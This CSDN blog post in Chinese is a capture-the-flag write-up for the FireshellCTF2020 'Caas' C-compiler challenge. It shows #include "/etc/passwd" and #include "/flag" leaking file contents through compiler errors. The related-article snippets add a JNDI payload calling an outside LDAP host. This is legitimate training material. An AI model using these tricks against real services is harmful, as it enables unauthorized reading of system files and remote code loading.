[FireshellCTF2020]Caas

最新推荐文章于 2023-12-13 13:53:56 发布
最新推荐文章于 2023-12-13 13:53:56 发布
阅读量690 收藏 1
点赞数
分类专栏: sql注入 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/128405599
版权

打开界面,是一个运行代码的*框,然后我们输入

本来以为会是一个ssti模板,{{8*8}}却仍然还是报错,print  echo 等输出都不行

只能分析分析报错信息看看有没有什么有用的东西

 /tmp目录下的,class_7eamm1tu3.c后缀名是c,明显是c语言的标志

把这个文件下载了下来然后,我们就要想能不能包含flag

然后想了一下,是因为识别了c的文件头包含了文件,然后可以下载,那么会不会存在任意读取漏洞呢

一搬flag都在 /flag 和 flag.txt

#include "/etc/passwd" 发现了这个,果然存在

 那么我们可以直接读取flag,#include "/flag"

这里的 ""  和<>的区别是,#include </flag>会直接读取系统中的,而""会先看本目录有没有,再去读取系统中。 

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu-[FireshellCTF2020]Caas
qaq517384的博客
10-22 396
打开环境是一个代码运行界面 直接输入一个cat /flag,显示报错 可以看到文件名/tmp/caas_6l09k25y.c(每次都不同),以及我们输入的代码 编译一个hello word #include <stdio.h> int main() { printf("Hello, World! \n"); } 会弹出一个下载文件 运行也能正确输出 写了个读flag的脚本,后来发现,载下来的本地脚本跟环境的flag没有一点关系,淦 回到开始的报错 多打了一个字导致报错:找不到文件
构建一个简单的CaaS系统
09-30
本文主要介绍如何从零开始构建一个简易的CaaS(Container as a Service)系统。简单易懂,希望有想学习的小伙伴可以关注下
BUUCTF [FireshellCTF2020] Caas
Senimo
01-11 712
BUUCTF [FireshellCTF2020] Caas 考点: #include ''预处理编译报错 启动环境: 提示是一个代码编译功能,尝试输入<?php echo 'Hello'; ?>,得到了报错: 根据报错发现是C语言编译器,输入: #include <stdio.h> int main() { printf("Hello, World! \n"); return 0; } 编译后下载了一个文件: 开始以为和这个文件有关,但是后续尝试中发
BUUCTF--[FireshellCTF2020]Caas
qq_46263951的博客
07-28 232
考点: #include ''预处理编译报错 文件包含 使用 # include "/flag" ,使flag可以在错误提示中出现
CaaS-Hazelcast
05-17
CaaS-使用Hazelcast进行即服务缓存(WIP)
CaaS在微服务开发运维中的最佳实践
01-27
本文分享会有三个方面的内容:第一是单体应用和微服务,我们会讨论在微服务当中容器和容器技术提供什么的支持;第二是容器即服务;第三是容器即服务在微服务的开发运维当中起什么作用; 1.1什么是单体应用 ...
CaaS CaaS CaaS
07-15
v天我们在这里组织这个会议,仍然处于全球经融危机引起的经济放缓的缓慢恢复期,而作为中国这个全球制造大国制造业最强大最集中的地区之一,温州也仍然面临着严峻的考验,需求下降,劳动力成本上升,原材料价格猛涨...
[FireshellCTF2020]Caas C的预处理
qq_54929891的博客
05-15 330
进入可以看到是一个编译器 ,输入简单的php代码试试 <?php phpinfo();?> 不知道什么的报错,直接复制报错代码百度一下看看(仔细地可以看见最前面有一个后缀.c) 发现清一色的C语言报错,那我们找个c语言代码传进去试试 #include <stdio.h> int main() { printf("hello, world"); } 下载出来一个不知什么文件 思路到这里就断了,其实可以猜到flag在服务器的某个文件下,也许..
-------已搬运--BUUCTF:[FireshellCTF2020]Caas ----观测报错消息
Zero_Adam的博客
04-20 229
一、自己做: 这个报错,,不认识, 这是什么编译的东西啊,, 二、学到的&&不足: 三、学习WP 这个后缀是.c的意思就是C语言的源代码,或者是预编译的。 Linux中生成的是.out。 然后window里的是exe文件后缀, 然后想一下,用C语言的语法来弄一下,, ??? 这个c语言的东西,第一句话就是包含头文件的意思,,, md,C像没学一样。 看看报错,说是期望""双引号或者<>尖括号试一试看看 ...
[FireshellCTF2020]Firehttpd
seaaseesa的博客
07-24 507
[FireshellCTF2020]Firehttpd 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在referer字段的解析里存在格式化字符串漏洞,由于是主进程fork子进程,因此,我们泄露的数据第二次不会改变仍然可以使用。 那么,我们利用格式化字符串漏洞,将文件名指针修改指向我们可控的地址,这样就可以读取我们想要的文件了。 #coding:utf8 from pwn import * ip = 'node3.buuoj.cn' port = 28726 sh = rem
[FireshellCTF2020]ScreenShooter
Sk1y的博客
01-22 4087
知识点:CVE-2019-17221,任意文件读取
FireShell CTF 2020 Re Simple Encryption
Hk_Mayfly的博客
03-23 221
1.代码分析 __int64 __fastcall sub_401CA0(signed int a1, __int64 *a2) { __int64 v2; // rsi __int64 v3; // rcx __int64 v4; // rdi __int64 v5; // rdx __int64 result; // rax __int64 v7; // r...
[FireshellCTF2020]Caas c语言预编译的文件包含
最新发布
m0_64180167的博客
12-13 345
发现返回了一个文件 执行是我们的代码 所以这里其实是c语言的编译器没错了。这里我们可以通过 #include 引入文件 然后进行包含。发现成功读取到了 这里我们直接读取flag。报错 这里我们查询一下 是c语言的编译。我们尝试输入正确的代码。
[BUUCTF][FireshellCTF2020]URL TO PDF
Y4tacker的博客
10-22 3250
前言:我想提起最强的剑! 文章目录考点WP部分 啊这,这道题我不知道是啥,跟着别人的wp做吧 考点 SSRF WP部分 首先题目是个提交框,可以提交一个 url 服务器会访问并转成 pdf 以供下载 试一下file协议??? 提示invalid url,完全不知道干嘛抓包试一试,然后啥都没有,看了下wp,然后我一开始以为是内网环境,结果是直接访问公网憨批了 是很不常见的 WeasyPrint,根据上面的考点,这个爬虫虽然不会渲染 js,但是却可以解析 <link attachment=xxx&g
寒假学习01
t1234的博客
01-16 2739
[GYCTF2020]Ez_Express [FireshellCTF2020]Caas [SWPU2019]Web4
buu-day10
anwen12的博客
01-27 2144
0x01 [红明谷CTF 2021]JavaWeb /;/json绕过权限校验,然后漏洞探测 ["java.net.InetAddress","khl16k.dnslog.cn"] ["br.com.anteros.dbcp.AnterosDBCPConfig", {"healthCheckRegistry": "ldap://8.142.93.103:9090/test"}] ["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation"
FireShell CTF 2019小记
郁离歌丶的博客
03-20 988
FireShell CTF 2019小记 8说了,国际赛的难度大家都晓得滴。看题 Python Learning Environment 沙盒逃逸orz,最近喜欢玩的一个东东。 在前端的python.js里面可以看到一些waf源码。不过还没有我自己fuzz来的快,毕竟前端也不是很熟,源码又太多。 fuzz结果:不能用数字,不能用[],还有一堆常见的关键词需要绕过。以及内置函数只剩下exec和pri...
微服务与云服务的关系密切,请搞清楚什么是 IaaS, PaaS, SaaS, FaaS, CaaS,及它们的区别?
04-07
关于IaaS、PaaS、SaaS、FaaS、CaaS的区别,这些都是云计算的服务模式。IaaS即基础设施即服务,是通过虚拟化技术提供计算资源、存储资源和网络资源。PaaS即平台即服务,是指云服务提供商为开发者提供平台和工具,让...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值